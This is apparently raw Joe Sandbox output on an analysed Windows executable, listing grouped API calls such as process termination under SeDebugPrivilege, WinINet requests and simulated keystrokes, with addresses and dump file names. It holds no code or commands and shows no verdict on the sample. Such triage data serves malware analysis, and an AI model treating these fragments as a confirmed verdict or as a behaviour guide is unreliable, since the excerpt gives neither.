                                                                                                                                                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F789F2
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78A06
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F78A30
                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F78A4A
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78A5C
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78AA5
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F78AF5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00F074D7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07567: GetClientRect.USER32(?,?), ref: 00F0758D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07567: GetWindowRect.USER32(?,?), ref: 00F075CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07567: ScreenToClient.USER32(?,?), ref: 00F075F6
                                                                                                                                                                                                                                                                                        • GetDC.USER32 ref: 00F46083
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F46096
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F460A4
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F460B9
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F460C1
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F46152
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F024B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetCursorPos.USER32(?), ref: 00F019E1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: ScreenToClient.USER32(00000000,?), ref: 00F019FE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetAsyncKeyState.USER32(00000001), ref: 00F01A23
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F019CD: GetAsyncKeyState.USER32(00000002), ref: 00F01A3D
                                                                                                                                                                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00F995C7
                                                                                                                                                                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00F995CD
                                                                                                                                                                                                                                                                                        • ReleaseCapture.USER32 ref: 00F995D3
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00F9966E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F99681
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00F9975B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7CCB7
                                                                                                                                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F7CCDF
                                                                                                                                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F7CD0F
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F7CD67
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 00F7CD7B
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F7CD86
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F455AE,?,?,Bad directive syntax error,00F9DCD0,00000000,00000010,?,?), ref: 00F6A236
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,00F455AE,?), ref: 00F6A23D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F6A301
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                        • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 00F629F8
                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00F62A0D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F62A9A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                        • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00F0758D
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F075CE
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F075F6
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00F0773A
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F0775B
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00F95C24
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00F95C65
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 00F95C6B
                                                                                                                                                                                                                                                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00F95C6F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F979F2: DeleteObject.GDI32(00000000), ref: 00F97A1E
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F95CAB
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F95CB8
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F95CEB
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00F95D25
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00F95D34
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F428D1
                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F428EA
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F428FA
                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F42912
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F42933
                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F011F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F42942
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F4295F
                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F011F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F4296E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F7CBC7
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F7CBDA
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 00F7CBEE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F7CCB7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7CC98: GetLastError.KERNEL32 ref: 00F7CD67
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7CC98: SetEvent.KERNEL32(?), ref: 00F7CD7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F7CC98: InternetCloseHandle.WININET(00000000), ref: 00F7CD86
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F643AD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: GetCurrentThreadId.KERNEL32 ref: 00F643B4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F62F00), ref: 00F643BB
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F62F0A
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F62F28
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F62F2C
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F62F36
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F62F4E
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F62F52
                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F62F5C
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F62F70
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F62F74
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F61D95,?,?,00000000), ref: 00F62159
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00F61D95,?,?,00000000), ref: 00F62160
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F61D95,?,?,00000000), ref: 00F62175
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00F61D95,?,?,00000000), ref: 00F6217D
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00F61D95,?,?,00000000), ref: 00F62180
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F61D95,?,?,00000000), ref: 00F62190
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00F61D95,00000000,?,00F61D95,?,?,00000000), ref: 00F62198
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00F61D95,?,?,00000000), ref: 00F6219B
                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00F621C1,00000000,00000000,00000000), ref: 00F621B5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00F6DDAC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00F6DDBA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DD87: CloseHandle.KERNEL32(00000000), ref: 00F6DE87
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8ABCA
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F8ABDD
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8AC10
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F8ACC5
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 00F8ACD0
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F8AD21
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F943C1
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00F943D6
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F943F0
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F94435
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F94462
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F94490
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                        • String ID: SysListView32
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F6C6C4
                                                                                                                                                                                                                                                                                        • IsMenu.USER32(00000000), ref: 00F6C6E4
                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00F6C71A
                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(016E5460), ref: 00F6C76B
                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(016E5460,?,00000001,00000030), ref: 00F6C793
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                        • String ID: 0$2
                                                                                                                                                                                                                                                                                        • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00F6D1BE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconLoad
                                                                                                                                                                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                        • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F439E2,00000004,00000000,00000000), ref: 00F1FC41
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F439E2,00000004,00000000,00000000), ref: 00F5FC15
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F439E2,00000004,00000000,00000000), ref: 00F5FC98
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ShowWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F937B7
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F937BF
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F937CA
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F937D6
                                                                                                                                                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F93812
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F93823
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F96504,?,?,000000FF,00000000,?,000000FF,?), ref: 00F9385E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F9387D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
